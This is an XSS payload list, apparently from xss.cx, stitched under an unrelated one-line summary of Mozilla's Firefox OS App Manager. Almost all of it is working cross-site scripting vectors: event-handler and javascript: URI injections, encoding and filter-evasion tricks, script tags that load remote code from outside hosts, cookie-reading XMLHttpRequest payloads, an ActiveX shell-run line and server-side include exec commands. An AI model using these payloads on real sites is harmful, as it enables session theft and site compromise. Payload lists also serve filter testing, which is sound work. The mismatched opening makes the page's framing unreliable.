<div class="summary">
<p><span class="seoSummary">The App Manager is a tool for Firefox Desktop which provides a number of useful tools to help developers test, deploy and debug HTML5 web apps on Firefox OS phones & Simulator, directly from Firefox browser. This page documents how to use the App Manager.</span></p>
/* Remote File Include with HTML TAGS via XSS.Cx */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas	cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>
<svg[U+000B]onload=alert(1)>
<iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}">
<cite><a href="javascript:confirm(1);">XSS cited!</a></cite>
<svg/onload=window.onerror=alert;throw/XSS/;//
<video src="x" onloadstart="alert(1)">
<a href="javascript:data:alert(1)">click</a>
<a href="javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)">click</a>
<div style='x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")'>aa</div>
<%%%>
<meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J
<!-- Hello -- world > <SCRIPT>confirm(1)</SCRIPT> -->
<! XSS="><img src=xx:x onerror=confirm(1)//">
"; ||confirm('XSS') || "
<? echo('<SCR)';
"/> <img src='aaa' onerror=confirm(document.domain)>
/> <img src='aaa' onerror=confirm(document.domain)>
<!-- --!><input value="--><body/onload=`confirm(4)//`">
<!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>
//|\\ <script //|\\ src='http://xss.cx/xss.js'> //|\\ </script //|\\
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
�</form><input type="date" onfocus="confirm(1)">
<
<
>
>
%2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E
%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E
%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E
%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E
"%25prompt(9)%25"
"%26%26prompt(9)%26%26"
%26lt%3bscript>
"%26prompt(9)%26"
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
<3 </3
"><h1/onmouseover='\u0061lert(1)'>%00
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
%3C
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
%3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E
%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
%3E
[4076*A]<img src="x" alt="[0x8F]" test=" onerror=confirm(1)//">
<
<
>
>
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
<A """><IMG SRC="javascript:confirm(1)">
"'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF
"'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF
<A/HREF="javascript:confirm(1)">
<B <SCRIPT>confirm(1)</SCRIPT>>
<BASE HREF="javascript:confirm('XSS');//">
<BGSOUND SRC="javascript:confirm('XSS');">
<BODY BACKGROUND="javascript:confirm('XSS')">
<BODY ONLOAD=confirm('XSS')>
<BR SIZE="&{confirm('XSS')}">
<B="<SCRIPT>confirm(1)</SCRIPT>">
<DIV STYLE="background-image: url(javascript:confirm(5))">
<DIV STYLE="background-image: url(javascript:confirm(5))">
<DIV STYLE="width: expression(confirm(5));">
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80
<FRAMESET><FRAME RC=""+"javascript:confirm(5);"></FRAMESET>
<FRAMESET><FRAME SRC="javascript:confirm(5);"></FRAMESET>
>
>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-
<HTML><BODY>
<IFRAME SRC="javascript:confirm(5);"></IFRAME>
<IFRAME%20src='javascript:confirm%26%23x25;281)'>
<![><IMG ALT="]><SCRIPT>confirm(1)</SCRIPT>">
<IMG ALT="><SCRIPT>confirm(1)</SCRIPT>"(EOF)
<IMG DYNSRC="javascript:confirm(document.location)">
<IMG LOWSRC="javascript:confirm(document.location)">
<IMG SRC="  javascript:confirm(document.location);">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:confirm(document.location)>
<IMG SRC=JaVaScRiPt:confirm("XSS<WBR>")>
<IMG SRC=JaVaScRiPt:prompt(document.location)>
<IMG SRC="jav ascript:confirm(document.location);">
<IMG SRC=java%00script:confirm(document.location)>
<IMG SRC=`javascript:confirm(1)`>
<IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))>
<IMG SRC=`javascript:confirm(document.cookie)`>
<IMG SRC="javascript:confirm(document.location)"
<IMG SRC="javascript:confirm(document.location);">
<IMG SRC=javascript:confirm(document.location)>
<IMG SRC=javascript:confirm("XSS")>
<IMG SRC=javascript:prompt(document.location)>
<IMG SRC="jav	ascript:confirm(<WBR>document.location);">
<IMG SRC="jav	ascript:confirm(document.location);">
<IMG SRC="jav
ascript:confirm(<WBR>document.location);">
<IMG SRC="jav
ascript:confirm(document.location);">
<IMG SRC="jav
ascript:confirm(<WBR>document.location);">
<IMG SRC="jav
ascript:confirm(document.location);">
<IMG SRC="livescript:[code]">
<IMG SRC="mocha:[code]">
<IMG SRC='vbscript:msgbox(document.location)'>
<IMG SRC=javascript:alert('XSS')>
<IMG STYLE="xss:expr/*XSS*/ession(confirm(document.location))">
<IMG onmouseover =confirm(1)>
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:confirm(document.location);">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="http://xss.cx/xss.css">
<LINK REL="stylesheet" HREF="javascript:confirm(document.location);">
<
<
<META HTTP-EQUIV="Link" Content="<http://xss.cx/xss.css>; REL=stylesheet">
<META HTTP-EQUIV="Link" Content="<javascript:confirm(document.location)>; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>confirm(document.location)</SCRIPT>">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:confirm(document.location);">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:confirm(document.location);">
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.cx/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT>
PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+
<S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>
<SCR%00IPT>confirm(document.location)</SCR%00IPT>
<SCRIPT SRC="http://xss.cx/xss.jpg"></SCRIPT>
<SCRIPT SRC=http://xss.cx/xss.js?<B>
<SCRIPT SRC=http://xss.cx/xss.js></SCRIPT>
<SCRIPT a=">" '' SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT a=">" SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
</SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT/XSS SRC="http://xss.cx/xss.js"></SCRIPT>
<SCRIPT>a=document.cookie
<SCRIPT>confirm(document.location);</SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.cx/xss.js"></SCRIPT>
SRC=
<IMG 6;avascript:alert('XSS')>
<STYLE TYPE="text/javascript">confirm(document.location);</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:confirm(document.location)")}</STYLE>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>.XSS{background-image:url("javascript:confirm(document.location)");}</STYLE><A CLASS=XSS></A>
<STYLE>@import'http://xss.cx/xss.css';</STYLE>
"><STYLE>@import"javascript:confirm(document.location)";</STYLE>
<STYLE>@im\port'\ja\vasc\ript:confirm(document.location)';</STYLE>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<TABLE BACKGROUND="javascript:confirm(document.location)">
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<a data-remote=true data-method=delete href=/delete_account>CLICK</a>
<a href=````>
<a href="#" onclick="confirm(' ');alert(2 ')">name</a>
<a href='#' onmouseover ="javascript:$('a').html(5)">a link</a>
<a href="// ͥ.ws">CLICK
<a href=[0x0b]" onclick=confirm(1)//">click</a>
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
<a href=``calc``>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>
<a href="data:text/html,%3cscript>confirm (1)</script>" >hello
<a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk+">click</a>
"/><a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
<a href="data:text/html,<script>eval(name)</script>" target="confirm(1)">click</a>
<a href=``explorer.exe``>
<a href="invalid:1" id=x name=y>test</a>
"/><a href="invalid:2" id=x name=y>test</a>
<a href="javascript:window['confirm'](1)">aa</a>
<a href="jAvAsCrIpT:confirm(1)">X</a>
<a href="jAvAsCrIpT:confirm(1)">X</a>
<a href="javas	cri
pt:confirm(1)">test</a>
<a href="//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a>
"/><a href=javascript:confirm(document.cookie)>Click Here</a>
"><a href=javascript:confirm(document.cookie)>Click Here</a>
<a href=javascript:confirm(document.cookie)>Click-XSS</a>
"><a href="javascript:\u0061le%72t(1)"><button>
<a href="javascript:\u0061le%72t(1)"><button>
<a href="javascript:'hello'" rel="sidebar">x</a>
<a href="javascript:void(0)" onmouseover=
javascript:confirm(1)
>X</a>
<a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme
a href="j&#x26#x41;vascript:confirm%252831337%2529">Hello</a>
<a href=``mspaint.exe``>
<a href=``notepad.exe``>
<a href=``shell:System``>
<a href='vbscript:"\"&confirm(1)''"'>
<a href="x:confirm(1)" id="test">click</a><script>eval(test+'')</script>
<a href=``xss.cx``>
<a id="x" href='http://adspecs.yahoo.com/adspecs.php' target="close(/*grabcookie(1)*/)">CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>
<a rel="noreferrer" href="//xss.cx">click</a>
<a target=_blank href="data:text/html,<script>confirm(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a>
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
<a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;#test<a"'%0A`= +%20>;
<a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;&x="><img src=x onerror=prompt(1);>#"><img src=x onerror=prompt(1);>test<a"'%0A`= +%20>;
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
about://xss.cx
<a/href[\0C]=ja	vasc	ript:confirm(1)>XXX</a>
<a/href=data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>
<a$href="data:text/html,%style=""3cscript>confirm((1)</sstyle=""cript>" onerror=>hello
<a/href=java	script:confirm%28/XSS/%29>click</a>
<a/href="javascript: javascript:prompt(1)"><input type="X">
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B'>xss
<a�[\x0B]onmosemove=confirm('\Done\')>
<a[\x0B]�onmouseover�=location=’jav\x41script\x3aconfirm\x28″ZDresearch”\x29′>ZDresearch
<body language=vbs onload=confirm-1
<body language=vbs onload=confirm-1
<body language=vbs onload=confirm-1
"><body language=vbs onload=window.location='http://xss.cx'>
<body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'>
<body scroll=confirm(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<body/onload=<!-->
confirm(1)>
<body/onload=<!-->
confirm(1)>
"<body/onload=<!-->
confirm(1);prompt(/XSS/.source)>"
"\"><body/onload=<!-->
confirm(1);prompt(/XSS/.source)>",
<body/onload=<!-->
confirm(1);prompt(/XSS/.source)>
><body/onload=<!-->
confirm(1);prompt(/XSS/.source)>
<button autofocus onfocus=confirm(2)>
<button onclick="window.open('http://xss.cx/::Error138 ');">CLICKME
"<button>'><img src=x onerror=confirm(0);></button>"
<button>'><img src=x onerror=confirm(0);></button>
charset=utf-
'`"><*chr*script>log(*num*)</script>
<command onmouseover="javascript:confirm(0);">Save //
<*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*>
<*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*>
<*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button>?f
<div contextmenu=x>right-click<menu id=x onshow=confirm(1)>
<div id="confirm(2)" style="x:expression(eval)(id)">
<div onmouseover='confirm(1)'>DIV</div>
<div onmouseover='confirm(1)'>DIV</div>
<div style="color:rgb(''�x:expression(confirm(URL=1))"></div>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button>
<%div%20style=xss:expression(prompt(1))>
<div/onmouseover='confirm(1)'> style="x:">
<div/onmouseover='confirm(1)'> style="x:">
<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>
<div/style="width:expression(confirm(1))">X</div>
<embed code="http://xss.cx/xss.swf" allowscriptaccess=always></embed>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.cx/xss.js></SCRIPT>'"-->
exp/*<XSS STYLE='no\xss:noxss("*//*");
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true);
<form action='data:text/html,<script>confirm(1)</script>'><button>CLICK
<form action='java	scri	pt:confirm(1)'><button>CLICK
<form action="javas	cript:confirm(1)" method="get"><input type="submit" value="Submit"></form>
<form id="myform" value="" action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>confirm(1)</textarea><input type="submit" value="Absenden"></form>
<form name=location >
<form><a href="javascript:\u0061lert(1)">X
<form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit>
<form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit>
<form/action=javascript:eval(setTimeout(confirm(1)))><input/type=submit>
//<form/action=javascript:confirm(document.cookie)><input/type='submit'>//
<form><button formaction=javascript:confirm(1)>CLICKME
<form><iframe 	  src="javascript:confirm(1)" 	;>
<form><input type=submit formaction=//xss.cx><textarea name=x>
<form><isindex formaction="javascript:confirm(1)"
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<frameset><frame/src=//xss.cx>
>
>
http://www.google<script .com>confirm(document.location)</script
http://www.<script abc>setTimeout('confirm(1)',1)</script .com>
http://www.<script>confirm(1)</script .com
<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->
<!--[if<img src=x:x onerror=confirm(5)//]-->
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<iframe %00 src="	javascript:prompt(1)	"%00>
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); confirm(Safe.get());</script>
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
<iframe src="" onmouseover="confirm(document.cookie)">
<iframe src="#" style=width:exp/**/ressi/**/on(confirm(1))>
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src="data:D,<script>confirm(top.document.body.innerHTML)</script>">
<iframe src="data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E"></iframe>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe srcdoc='<body onload=prompt(1)>'>
<iframe srcdoc='<svg/onload=confirm(3)>'>
<iframe srcdoc="<svg/onload=confirm(domain)>">
<iframe src="http://xss.cx?x=<iframe name=x></iframe>"></iframe><a href="http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script>
